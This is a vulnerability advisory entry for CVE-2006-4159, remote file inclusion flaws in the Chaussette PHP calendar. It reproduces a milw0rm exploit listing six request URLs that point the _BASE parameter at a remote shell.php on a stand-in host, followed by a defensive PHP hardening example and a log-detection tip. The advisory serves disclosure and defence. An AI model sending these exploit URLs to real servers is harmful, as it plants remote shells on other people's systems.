Chaussette Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1110800
Vulnerability type: code injection
Published: 2006-08-10
Updated: 2006-09-05
CVE: CVE-2006-4159
CNNVD ID: CNNVD-200608-273
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-273
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities in Chaussette 080706 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _BASE parameter of the scripts under Classes/, namely (1) Evenement.php, (2) Event.php, (3) Event_for_month.php, (4) Event_for_week.php, (5) My_Log.php and (6) My_Smarty.php, and possibly also (7) Event_for_month_per_day.php.
|Exploit
Chaussette Remote File Inclusion

CreW: ToXiC
Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip

Pages affected:
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php

Problem is:
$_BASE not declared;

ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php

Greatz: Str0ke

# milw0rm.com [2006-08-10]
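The advisory's one-line root cause ("$_BASE not declared") is the classic register_globals file-inclusion pattern: an uninitialised variable becomes whatever the request supplies, and the script then uses it as an include prefix. The following is an added illustration, not Chaussette's own source, showing that shape next to a hardened replacement; the `<base>/Classes/` layout, the constant name and the helper functions are assumptions.

```php
<?php
// Added example, not Chaussette's code. It reconstructs the pattern the advisory
// describes and shows a hardened replacement. Assumed: the Classes/ scripts build
// an include path from $_BASE, and with register_globals=On a request such as
// ?_BASE=http://... defines that variable before the include runs.
declare(strict_types=1);

// VULNERABLE shape (kept as a comment on purpose): $_BASE is never assigned, so
// under register_globals an attacker-supplied URL becomes the include prefix.
//   include($_BASE . 'Classes/My_Smarty.php');

// HARDENED: anchor the base directory to the script's own location, never to
// request data, and validate every include path against it.
define('CHAUSSETTE_BASE', dirname(__DIR__));   // assumed layout: <base>/Classes/

function resolve_class_file(string $base, string $class): string
{
    // Only bare identifiers: no slashes, dots, NUL bytes or URL schemes.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $class)) {
        throw new InvalidArgumentException("rejected class name: $class");
    }
    $dir  = realpath($base . '/Classes');
    $path = realpath($base . '/Classes/' . $class . '.php');
    // realpath() returns false for URLs and missing files and collapses "..",
    // so a result that still starts with $dir is a real local file in Classes/.
    if ($dir === false || $path === false
        || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("include outside Classes/: $class");
    }
    return $path;
}

// Defence in depth: refuse to run under the ini settings that make this bug
// exploitable. register_globals turns request parameters into globals;
// allow_url_include (PHP >= 5.2) lets include() fetch http:// targets. On older
// PHP the equivalent switch for include() is allow_url_fopen.
function refuse_dangerous_ini(): void
{
    foreach (['register_globals', 'allow_url_include'] as $opt) {
        // ini_get() returns false for options this PHP build does not know.
        if (filter_var(ini_get($opt), FILTER_VALIDATE_BOOLEAN)) {
            error_log("refusing to run: php.ini option $opt is enabled");
            exit(1);
        }
    }
}

refuse_dangerous_ini();
require resolve_class_file(CHAUSSETTE_BASE, 'My_Smarty');
```

For detection, the same property is visible in web server logs: any request to the listed Classes/ scripts whose `_BASE` value begins with a URL scheme is an exploitation attempt, not legitimate use.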
|References

BID 19480: http://www.securityfocus.com/bid/19480
OSVDB 27902: http://www.osvdb.org/27902
OSVDB 27901: http://www.osvdb.org/27901
OSVDB 27900: http://www.osvdb.org/27900
OSVDB 27899: http://www.osvdb.org/27899
OSVDB 27898: http://www.osvdb.org/27898
OSVDB 27897: http://www.osvdb.org/27897
VUPEN ADV-2006-3269: http://www.frsirt.com/english/advisories/2006/3269
SECUNIA 21489: http://secunia.com/advisories/21489
MILW0RM 2169: http://milw0rm.com/exploits/2169
XF chaussette-base-file-include(28327): http://xforce.iss.net/xforce/xfdb/28327